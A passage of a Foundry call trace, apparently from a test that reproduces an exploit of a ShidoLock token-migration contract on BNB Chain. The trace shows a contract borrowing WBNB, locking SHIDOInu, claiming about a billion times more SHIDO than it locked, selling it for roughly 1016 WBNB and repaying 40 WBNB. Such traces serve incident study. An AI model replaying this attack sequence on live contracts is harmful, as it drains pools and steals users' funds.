    │   │   │   │   │   │   ├─ [2676] 0xcA143Ce32Fe78f1f7019d7d551a6402fC5350c73::getPair(SHIDOInu: [0x733Af324146DCfe743515D8D77DC25140a07F9e0], WBNB: [0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c]) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 0xd0A167d1973cA8f76723C6FEa1E6f608DBC1d464
    │   │   │   │   │   │   ├─ [893] 0xd0A167d1973cA8f76723C6FEa1E6f608DBC1d464::getReserves() [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 11552532887736522884 [1.155e19], 81942415493232206270 [8.194e19], 1687561237 [1.687e9]
    │   │   │   │   │   │   ├─ [60608] SHIDOInu::transferFrom(SHIDOInu: [0x733Af324146DCfe743515D8D77DC25140a07F9e0], 0xd0A167d1973cA8f76723C6FEa1E6f608DBC1d464, 24991582474200809 [2.499e16])
    │   │   │   │   │   │   │   ├─ emit Transfer(from: SHIDOInu: [0x733Af324146DCfe743515D8D77DC25140a07F9e0], to: 0xd0A167d1973cA8f76723C6FEa1E6f608DBC1d464, value: 24991582474200809 [2.499e16])
    │   │   │   │   │   │   │   ├─ emit Approval(owner: SHIDOInu: [0x733Af324146DCfe743515D8D77DC25140a07F9e0], spender: PancakeRouter: [0x10ED43C718714eb63d5aA57B78B54704E256024E], value: 8417525799191 [8.417e12])
    │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   @ 0x78d66bb6e52cf8b5a2f5c78744a88db9f806920fa6e8affb86d03d44a6fad3e2: 0x1a1609abcebafa12a0488d6b7a1921b262790083784adff79ee63a6cb279d3c9 → 0x1a247bffad176f3092e1fbb4cdbb675683822050e7fe72444b9286627896a4fc
    │   │   │   │   │   │   │   │   @ 0x5982c18f27cf1d76b1575aafa82632142d484bf9cf9ec41c746a790053b98155: 0x0012b1e04dd37e31ea637512c2cf8d7a59a47ddb6dcfb6815dec70968616cd5e → 0x00043f8c6f770913f7ca06c96f2d47d6389b5e0dfe1c2434b14024a0bff9fc2b
    │   │   │   │   │   │   │   │   @ 0x9819b2e97d75e163ba29ee2b7f0befb9446ca45221f008f73899877bd42ee3f6: 0x0000000000000000000000000000000000000000000000000058d15e17628000 → 0x000000000000000000000000000000000000000000000000000007a7dba29917
    │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   ├─ [21974] WBNB::deposit{value: 177265942874591576}()
    │   │   │   │   │   │   │   ├─ emit Deposit(dst: PancakeRouter: [0x10ED43C718714eb63d5aA57B78B54704E256024E], wad: 177265942874591576 [1.772e17])
    │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   @ 0x1fb4de8f865d751e0e8d9986066405ce08df416aff5fdd6299ad70c234250abc: 0 → 0x0000000000000000000000000000000000000000000000000275c66f93d09158
    │   │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   │   ├─ [3262] WBNB::transfer(0xd0A167d1973cA8f76723C6FEa1E6f608DBC1d464, 177265942874591576 [1.772e17])
    │   │   │   │   │   │   │   ├─ emit Transfer(from: PancakeRouter: [0x10ED43C718714eb63d5aA57B78B54704E256024E], to: 0xd0A167d1973cA8f76723C6FEa1E6f608DBC1d464, value: 177265942874591576 [1.772e17])
    │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   @ 0x52e8c781a0094a02203a911a596e19fd4afe17e0de878ad829f1c65fdec48e5c: 0x000000000000000000000000000000000000000000000004712df0bdd79221be → 0x00000000000000000000000000000000000000000000000473a3b72d6b62b316
    │   │   │   │   │   │   │   │   @ 0x1fb4de8f865d751e0e8d9986066405ce08df416aff5fdd6299ad70c234250abc: 0x0000000000000000000000000000000000000000000000000275c66f93d09158 → 0
    │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   ├─ [72811] 0xd0A167d1973cA8f76723C6FEa1E6f608DBC1d464::mint(0x7ef6E527969054afbc0980E00C51D2E645b4A5ef)
    │   │   │   │   │   │   │   ├─ [14398] SHIDOInu::balanceOf(0xd0A167d1973cA8f76723C6FEa1E6f608DBC1d464) [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 11577524470210723693 [1.157e19]
    │   │   │   │   │   │   │   ├─ [534] WBNB::balanceOf(0xd0A167d1973cA8f76723C6FEa1E6f608DBC1d464) [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 82119681436106797846 [8.211e19]
    │   │   │   │   │   │   │   ├─ [2354] 0xcA143Ce32Fe78f1f7019d7d551a6402fC5350c73::feeTo() [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 0x0ED943Ce24BaEBf257488771759F9BF482C39706
    │   │   │   │   │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: 0x0ED943Ce24BaEBf257488771759F9BF482C39706, value: 4651533504816662 [4.651e15])
    │   │   │   │   │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: 0x7ef6E527969054afbc0980E00C51D2E645b4A5ef, value: 52377957875220932 [5.237e16])
    │   │   │   │   │   │   │   ├─ emit Sync(reserve0: 11577524470210723693 [1.157e19], reserve1: 82119681436106797846 [8.211e19])
    │   │   │   │   │   │   │   ├─ emit Mint(sender: PancakeRouter: [0x10ED43C718714eb63d5aA57B78B54704E256024E], amount0: 24991582474200809 [2.499e16], amount1: 177265942874591576 [1.772e17])
    │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   @ 0xce5a46cd565c798db4579e1721082d7b4156f14a385995b283ae5d8d572faf65: 0x000000000000000000000000000000000000000000000000019708f199bd247f → 0x00000000000000000000000000000000000000000000000001a78f7d23f44a95
    │   │   │   │   │   │   │   │   @ 11: 0x00000000000000000000000000000002c751db76472f573955df3585222986ec → 0x00000000000000000000000000000002cb425e4e1773d54efcbc4592837c2a5e
    │   │   │   │   │   │   │   │   @ 0x3096b260420dabf29b82b6c2e08073d0f87cafcf0da927a6730631a77927b3b2: 0x000000000000000000000000000000000000000000000000092c759409b7c928 → 0x00000000000000000000000000000000000000000000000009e68b0daeee4aec
    │   │   │   │   │   │   │   │   @ 0: 0x0000000000000000000000000000000000000000000000014ff20bd004ba827e → 0x00000000000000000000000000000000000000000000000150bca7d534282a58
    │   │   │   │   │   │   │   │   @ 8: 0x64962415000000000004712df0bdd79221be000000000000a052d774158d9884 → 0x6496241500000000000473a3b72d6b62b316000000000000a0aba12a514d7f6d
    │   │   │   │   │   │   │   └─ ← [Return] 52377957875220932 [5.237e16]
    │   │   │   │   │   │   └─ ← [Return] 24991582474200809 [2.499e16], 177265942874591576 [1.772e17], 52377957875220932 [5.237e16]
    │   │   │   │   │   ├─ emit SwapAndLiquify(: 25000000000000000 [2.5e16], : 177265942874591576 [1.772e17], : 25000000000000000 [2.5e16])
    │   │   │   │   │   ├─ emit Transfer(from: ShidoTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: AddRemoveLiquidityForFeeOnTransferTokens: [0x9869674E80D632F93c338bd398408273D20a6C8e], value: 1000000000 [1e9])
    │   │   │   │   │   ├─ emit Approval(owner: ShidoTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: AddRemoveLiquidityForFeeOnTransferTokens: [0x9869674E80D632F93c338bd398408273D20a6C8e], value: 115792089237316195423570985008687907853269984665640564039457584007912129639935 [1.157e77])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0xf947576712b5cc461abb50952c228703dd937cc767310a5cb2464dd55e8490c5: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffc46535ff
    │   │   │   │   │   │   @ 0x9819b2e97d75e163ba29ee2b7f0befb9446ca45221f008f73899877bd42ee3f6: 0x00000000000000000000000000000000000000000000000000001f04e27ab64e → 0x0000000000000000000000000000000000000000000000000058d15e17628000
    │   │   │   │   │   │   @ 12: 0 → 1
    │   │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x000002131ba1346afd65419697ad8281a95e660cbe6497877598c1c238e6c50e → 0x0000021311ee769238af009561fe8aa2200a4a2eef2908a467847ad39e73370e
    │   │   │   │   │   │   @ 0x8bf0fbbf83b2a2fb4d708171a4b0d9cca3a1d152450e64bc374f362ee2235e9c: 0x17912dcda5384b019d1b82c74d7489194de82225860e2e4ef6c5c1cd4ac475f3 → 0x17912dcdaeeb08da61d1c3c8832380f8d73c3e035549bd3204da08bbe53803f3
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [2785] SHIDOInu::allowance(AddRemoveLiquidityForFeeOnTransferTokens: [0x9869674E80D632F93c338bd398408273D20a6C8e], 0xC9a0F685F39d05D835c369036251ee3aEaaF3c47) [staticcall]
    │   │   │   │   │   └─ ← [Return] 115792089237316195423570985008687907853269984665640564039457235799758663681750 [1.157e77]
    │   │   │   │   ├─ [235368] 0xC9a0F685F39d05D835c369036251ee3aEaaF3c47::addLiquidityETH{value: 10000000000000000}(SHIDOInu: [0x733Af324146DCfe743515D8D77DC25140a07F9e0], 1000000000 [1e9], 1, 1, ShidoTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1687561337 [1.687e9])
    │   │   │   │   │   ├─ [2644] 0x4693B62E5fc9c0a45F89D62e6300a03C85f43137::getPair(SHIDOInu: [0x733Af324146DCfe743515D8D77DC25140a07F9e0], WBNB: [0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c]) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 0xa8aeeA8105F4A10a96fCa539697bFA6F762d0F64
    │   │   │   │   │   ├─ [2540] 0xa8aeeA8105F4A10a96fCa539697bFA6F762d0F64::getReserves() [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 77600061351417972 [7.76e16], 48812736831150400422 [4.881e19], 1687543480 [1.687e9]
    │   │   │   │   │   ├─ [70208] SHIDOInu::transferFrom(AddRemoveLiquidityForFeeOnTransferTokens: [0x9869674E80D632F93c338bd398408273D20a6C8e], 0xa8aeeA8105F4A10a96fCa539697bFA6F762d0F64, 1000000000 [1e9])
    │   │   │   │   │   │   ├─ emit Transfer(from: AddRemoveLiquidityForFeeOnTransferTokens: [0x9869674E80D632F93c338bd398408273D20a6C8e], to: 0xa8aeeA8105F4A10a96fCa539697bFA6F762d0F64, value: 1000000000 [1e9])
    │   │   │   │   │   │   ├─ emit Approval(owner: AddRemoveLiquidityForFeeOnTransferTokens: [0x9869674E80D632F93c338bd398408273D20a6C8e], spender: 0xC9a0F685F39d05D835c369036251ee3aEaaF3c47, value: 115792089237316195423570985008687907853269984665640564039457235799757663681750 [1.157e77])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0x916752a0ff5fddb6a876107194b9e78632262b36ed2ede1eea30c3e41fc1519e: 0xfffffffffffffffffffffffffffffffffffffffffffffffffb2aea87452986d6 → 0xfffffffffffffffffffffffffffffffffffffffffffffffffb2aea87098ebcd6
    │   │   │   │   │   │   │   @ 0x8bf0fbbf83b2a2fb4d708171a4b0d9cca3a1d152450e64bc374f362ee2235e9c: 0x17912dcdaeeb08da61d1c3c8832380f8d73c3e035549bd3204da08bbe53803f3 → 0x17912dcda5384b019d1b82c74d7489194de82225860e2e4ef6c5c1cd4ac475f3
    │   │   │   │   │   │   │   @ 0x83130cc0d15594e4f640f5c39bac57271c505debf8b4ded871c481fe986fb91b: 0x002cdb7c07204a98ada20800aa41079e4fa51979ba1e206133fb481287fec0bc → 0x002cdb7c10d3087172584901dfefff7dd8f935578959af44420f8f0122724ebc
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   ├─ [23974] WBNB::deposit{value: 629029616485}()
    │   │   │   │   │   │   ├─ emit Deposit(dst: 0xC9a0F685F39d05D835c369036251ee3aEaaF3c47, wad: 629029616485 [6.29e11])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0xf6f4d16e9e827ff3aeddd3f7cf57141541c0d0f8338bc1b5c778fa4baac53716: 0 → 0x0000000000000000000000000000000000000000000000000000009275163b65
    │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   ├─ [8062] WBNB::transfer(0xa8aeeA8105F4A10a96fCa539697bFA6F762d0F64, 629029616485 [6.29e11])
    │   │   │   │   │   │   ├─ emit Transfer(from: 0xC9a0F685F39d05D835c369036251ee3aEaaF3c47, to: 0xa8aeeA8105F4A10a96fCa539697bFA6F762d0F64, value: 629029616485 [6.29e11])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0xe2a5dbda55e712d3b74b7b1a3b48f29fca3e8f5f250ec633df920a6e8580ccfc: 0x000000000000000000000000000000000000000000000002a569ad86e758a3a6 → 0x000000000000000000000000000000000000000000000002a569ae195c6edf0b
    │   │   │   │   │   │   │   @ 0xf6f4d16e9e827ff3aeddd3f7cf57141541c0d0f8338bc1b5c778fa4baac53716: 0x0000000000000000000000000000000000000000000000000000009275163b65 → 0
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   ├─ [101090] 0xa8aeeA8105F4A10a96fCa539697bFA6F762d0F64::mint(ShidoTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   │   │   │   ├─ [14398] SHIDOInu::balanceOf(0xa8aeeA8105F4A10a96fCa539697bFA6F762d0F64) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 77600062351417972 [7.76e16]
    │   │   │   │   │   │   ├─ [534] WBNB::balanceOf(0xa8aeeA8105F4A10a96fCa539697bFA6F762d0F64) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 48812737460180016907 [4.881e19]
    │   │   │   │   │   │   ├─ [2338] 0x4693B62E5fc9c0a45F89D62e6300a03C85f43137::feeTo() [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 0x1551EAC5D2EDAa634f713A526866Ad83b82b5209
    │   │   │   │   │   │   ├─ [2381] 0x4693B62E5fc9c0a45F89D62e6300a03C85f43137::feeToTreasury() [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000001551eac5d2edaa634f713a526866ad83b82b5209
    │   │   │   │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: ShidoTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 24435333142 [2.443e10])
    │   │   │   │   │   │   ├─ emit Sync(reserve0: 77600062351417972 [7.76e16], reserve1: 48812737460180016907 [4.881e19])
    │   │   │   │   │   │   ├─ emit Mint(sender: 0xC9a0F685F39d05D835c369036251ee3aEaaF3c47, amount0: 1000000000 [1e9], amount1: 629029616485 [6.29e11])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0: 0x0000000000000000000000000000000000000000000000001a5098b61a200518 → 0x0000000000000000000000000000000000000000000000001a5098bbca959d2e
    │   │   │   │   │   │   │   @ 9: 0x6495deb8000000000002a569ad86e758a3a60000000000000113b0d83b665874 → 0x64962415000000000002a569ae195c6edf0b0000000000000113b0d877012274
    │   │   │   │   │   │   │   @ 10: 0x000000000000000000000000000242f98069df9ca6a2ecae7f151af2bfeb9bbb → 0x000000000000000000000000000243a3eff8c5fee9673e64f400c192cbc6c66a
    │   │   │   │   │   │   │   @ 12: 0x0000000000000000000000000000000002d9847a3d8fda407138cfbfc28f3738 → 0x0000000000000000000000000000000002d9847b7901c08e44c7e92997e786fc
    │   │   │   │   │   │   │   @ 11: 0x00000000000000000000000000000000d3b6fedbd16d6def25d454f201f5a173 → 0x00000000000000000000000000000000d3d339885f5424bf9e922af01189b287
    │   │   │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0 → 0x00000000000000000000000000000000000000000000000000000005b0759816
    │   │   │   │   │   │   └─ ← [Return] 24435333142 [2.443e10]
    │   │   │   │   │   ├─ [55] AddRemoveLiquidityForFeeOnTransferTokens::fallback{value: 9999370970383515}()
    │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   └─ ← [Return] 1000000000 [1e9], 629029616485 [6.29e11], 24435333142 [2.443e10]
    │   │   │   │   ├─ [644] 0x4693B62E5fc9c0a45F89D62e6300a03C85f43137::getPair(SHIDOInu: [0x733Af324146DCfe743515D8D77DC25140a07F9e0], WBNB: [0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 0xa8aeeA8105F4A10a96fCa539697bFA6F762d0F64
    │   │   │   │   ├─ [14398] SHIDOInu::balanceOf(AddRemoveLiquidityForFeeOnTransferTokens: [0x9869674E80D632F93c338bd398408273D20a6C8e]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 10436972685676390697 [1.043e19]
    │   │   │   │   ├─ [57909] SHIDOInu::transfer(ShidoTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 10436972685676390697 [1.043e19])
    │   │   │   │   │   ├─ emit Transfer(from: AddRemoveLiquidityForFeeOnTransferTokens: [0x9869674E80D632F93c338bd398408273D20a6C8e], to: ShidoTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 10436972685676390697 [1.043e19])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x8bf0fbbf83b2a2fb4d708171a4b0d9cca3a1d152450e64bc374f362ee2235e9c: 0x17912dcda5384b019d1b82c74d7489194de82225860e2e4ef6c5c1cd4ac475f3 → 0
    │   │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x0000021311ee769238af009561fe8aa2200a4a2eef2908a467847ad39e73370e → 0x17912fe0b726c193d5ca835caf7313bb6df26c54753736f35e4a3ca0e937ad01
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [55] ShidoTest::receive{value: 9999370970383515}()
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   ├─ emit LiquidityAdded(param0: ShidoTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param1: SHIDOInu: [0x733Af324146DCfe743515D8D77DC25140a07F9e0], param2: WBNB: [0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c], param3: 1000000000 [1e9], param4: 629029616485 [6.29e11], param5: 24435333142 [2.443e10])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x7ec9f9f181b377d53faecb2b12eec3db32f931e7d7156687c48170ea0c75095c: 0 → 0x00000000000000000000000000000000000000000000000000000005b0759816
    │   │   │   │   └─ ← [Return] 1000000000 [1e9], 629029616485 [6.29e11], 24435333142 [2.443e10]
    │   │   │   ├─ [111575] ShidoLock::lockTokens()
    │   │   │   │   ├─ [14398] SHIDOInu::balanceOf(ShidoTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 10436986704133494387 [1.043e19]
    │   │   │   │   ├─ [69606] SHIDOInu::transferFrom(ShidoTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x7ef6E527969054afbc0980E00C51D2E645b4A5ef, 10436986704133494387 [1.043e19])
    │   │   │   │   │   ├─ emit Transfer(from: ShidoTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x7ef6E527969054afbc0980E00C51D2E645b4A5ef, value: 10436986704133494387 [1.043e19])
    │   │   │   │   │   ├─ emit Approval(owner: ShidoTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: ShidoLock: [0xaF0CA21363219C8f3D8050E7B61Bb5f04e02F8D4], value: 115792089237316195423570985008687907853269984665640564039447147021208996145548 [1.157e77])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x17912fe0b726c193d5ca835caf7313bb6df26c54753736f35e4a3ca0e937ad01 → 0
    │   │   │   │   │   │   @ 0xbfbd819bee7413a014b56cf4a503f98b570a1273403ef6f1c629ebd3e612b335: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0xffffffffffffffffffffffffffffffffffffffffffffffff6f285fe3dea5e98c
    │   │   │   │   │   │   @ 0x3096b260420dabf29b82b6c2e08073d0f87cafcf0da927a6730631a77927b3b2: 0x04299b25791315b4325385efa3cfec4259901451f268bcc5e7a41c7f60d85f19 → 0x1bbacb063039d748081e094c5342fffdc78280a6679ff3b945ee59204a100c1a
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x9a37937c0ede8c307bf0496ec60e131422d44420befc187978dc5326d56d38a4: 0 → 0x00000000000000000000000000000000000000000000000090d7a01c215a1673
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [80251] ShidoLock::claimTokens()
    │   │   │   │   ├─ [52555] SHIDO::transferFrom(0x7ef6E527969054afbc0980E00C51D2E645b4A5ef, ShidoTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 10436986704133494387000000000 [1.043e28])
    │   │   │   │   │   ├─ emit Transfer(from: 0x7ef6E527969054afbc0980E00C51D2E645b4A5ef, to: ShidoTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 10436986704133494387000000000 [1.043e28])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0 → 0x000000000000000000000000000000000000000021b945e6f0f205af17e4be00
    │   │   │   │   │   │   @ 0xaecfb03da7424f86994e0675acabfc0d5da6b5f704b53baaaa1763b58ac357b6: 0x000000000000000000000000000000000000000024b118a16b62cd1730c2d401 → 0x000000000000000000000000000000000000000002f7d2ba7a70c76818de1601
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0xcbca2c2e1a1577eb2e25b9dce980a2cead88d4a5422449a454760a1d38d5b82a: 0 → 0x000000000000000000000000000000000000000021b945e6f0f205af17e4be00
    │   │   │   │   │   @ 0x9a37937c0ede8c307bf0496ec60e131422d44420befc187978dc5326d56d38a4: 0x00000000000000000000000000000000000000000000000090d7a01c215a1673 → 0
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [624] SHIDO::balanceOf(ShidoTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   └─ ← [Return] 10436986704133494387000000000 [1.043e28]
    │   │   │   ├─ [94438] PancakeRouter::swapExactTokensForTokensSupportingFeeOnTransferTokens(10436986704133494387000000000 [1.043e28], 500000000000000000000 [5e20], [0xa963eE460Cf4b474c35ded8fFF91c4eC011FB640, 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c], ShidoTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1687561337 [1.687e9])
    │   │   │   │   ├─ [37679] SHIDO::transferFrom(ShidoTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x0fb0dA54b6eF183fB4b67BFe01af44e06D576Ef3, 10436986704133494387000000000 [1.043e28])
    │   │   │   │   │   ├─ emit Transfer(from: ShidoTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: SHIDO: [0xa963eE460Cf4b474c35ded8fFF91c4eC011FB640], value: 1043698670413349438700000000 [1.043e27])
    │   │   │   │   │   ├─ emit Transfer(from: ShidoTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x0fb0dA54b6eF183fB4b67BFe01af44e06D576Ef3, value: 9393288033720144948300000000 [9.393e27])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 16: 0x0000000000000000000000000000000000000000000138b54e1d630a0bc102cc → 0x000000000000000000000000000000000000000001b0e29a73c3168600260c4c
    │   │   │   │   │   │   @ 17: 0x0000000000000000000000000000000000000000000138b54e1d630a0bc102cc → 0x000000000000000000000000000000000000000001b0e29a73c3168600260c4c
    │   │   │   │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0x000000000000000000000000000000000000000021b945e6f0f205af17e4be00 → 0
    │   │   │   │   │   │   @ 0x6da01ce5f8483d30f28a88d1b669f44a60d198caf78700a855ff975907ec8f85: 0x00000000000000000000000000000000000000000002716a9c3ac61417820598 → 0x00000000000000000000000000000000000000000361c534e7862d0c004c1898
    │   │   │   │   │   │   @ 0xcdf630e154cf382b3dabdf9d169fd21053d93c25a4505689aeca70709f5face3: 0x0000000000000000000000000000000000000000054b9867e861651678b86a34 → 0x000000000000000000000000000000000000000023a58a848e0803cda7d31534
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [534] WBNB::balanceOf(ShidoTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 890000000000000000 [8.9e17]
    │   │   │   │   ├─ [2893] 0x0fb0dA54b6eF183fB4b67BFe01af44e06D576Ef3::getReserves() [staticcall]
    │   │   │   │   │   └─ ← [Return] 1638814202042634346612419124 [1.638e27], 1193802448178091070023 [1.193e21], 1687560670 [1.687e9]
    │   │   │   │   ├─ [624] SHIDO::balanceOf(0x0fb0dA54b6eF183fB4b67BFe01af44e06D576Ef3) [staticcall]
    │   │   │   │   │   └─ ← [Return] 11032102235762779294912419124 [1.103e28]
    │   │   │   │   ├─ [42532] 0x0fb0dA54b6eF183fB4b67BFe01af44e06D576Ef3::swap(0, 1016085297305562276696 [1.016e21], ShidoTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x)
    │   │   │   │   │   ├─ [8062] WBNB::transfer(ShidoTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1016085297305562276696 [1.016e21])
    │   │   │   │   │   │   ├─ emit Transfer(from: 0x0fb0dA54b6eF183fB4b67BFe01af44e06D576Ef3, to: ShidoTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 1016085297305562276696 [1.016e21])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0x9e3146ce2a463be8bc056384a4454787c57e90041445d5b374c83f5ab9b4f57d: 0x000000000000000000000000000000000000000000000040b7564994decb1247 → 0x000000000000000000000000000000000000000000000009a2522721fb94aeef
    │   │   │   │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x0000000000000000000000000000000000000000000000000c59ea48da190000 → 0x000000000000000000000000000000000000000000000037215e0cbbbd4f6358
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   ├─ [624] SHIDO::balanceOf(0x0fb0dA54b6eF183fB4b67BFe01af44e06D576Ef3) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 11032102235762779294912419124 [1.103e28]
    │   │   │   │   │   ├─ [534] WBNB::balanceOf(0x0fb0dA54b6eF183fB4b67BFe01af44e06D576Ef3) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 177717150872528793327 [1.777e20]
    │   │   │   │   │   ├─ emit Sync(reserve0: 11032102235762779294912419124 [1.103e28], reserve1: 177717150872528793327 [1.777e20])
    │   │   │   │   │   ├─ emit Swap(sender: PancakeRouter: [0x10ED43C718714eb63d5aA57B78B54704E256024E], amount0In: 9393288033720144948300000000 [9.393e27], amount1In: 0, amount0Out: 0, amount1Out: 1016085297305562276696 [1.016e21], to: ShidoTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 8: 0x649621de000000000040b7564994decb12470000054b9867e861651678b86a34 → 0x64962415000000000009a2522721fb94aeef000023a58a848e0803cda7d31534
    │   │   │   │   │   │   @ 9: 0x000000000000000000000000000000000000049575202c6134fb486abfc460e0 → 0x00000000000000000000000000000000000004b086afb40d8cdb47c7e312d4d9
    │   │   │   │   │   │   @ 10: 0x0000000000000000000000000008e153cbc71b4f8b1c7664fe0995192c92d567 → 0x00000000000000000000000000090fb89f26727d4059ba754f7054f3d550d576
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   ├─ [534] WBNB::balanceOf(ShidoTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 1016975297305562276696 [1.016e21]
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [3262] WBNB::transfer(DPPAdvanced: [0x81917eb96b397dFb1C6000d28A5bc08c0f05fC1d], 40000000000000000000 [4e19])
    │   │   │   │   ├─ emit Transfer(from: ShidoTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: DPPAdvanced: [0x81917eb96b397dFb1C6000d28A5bc08c0f05fC1d], value: 40000000000000000000 [4e19])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x3c60da1376f85a7f3c888682818856b0c611572c8d06dc51114a9951a6f90e17: 0x0000000000000000000000000000000000000000000000316e0518a1e644e632 → 0x0000000000000000000000000000000000000000000000339921a4b40de4e632
    │   │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x000000000000000000000000000000000000000000000037215e0cbbbd4f6358 → 0x000000000000000000000000000000000000000000000034f64180a995af6358
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0xf947576712b5cc461abb50952c228703dd937cc767310a5cb2464dd55e8490c5: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
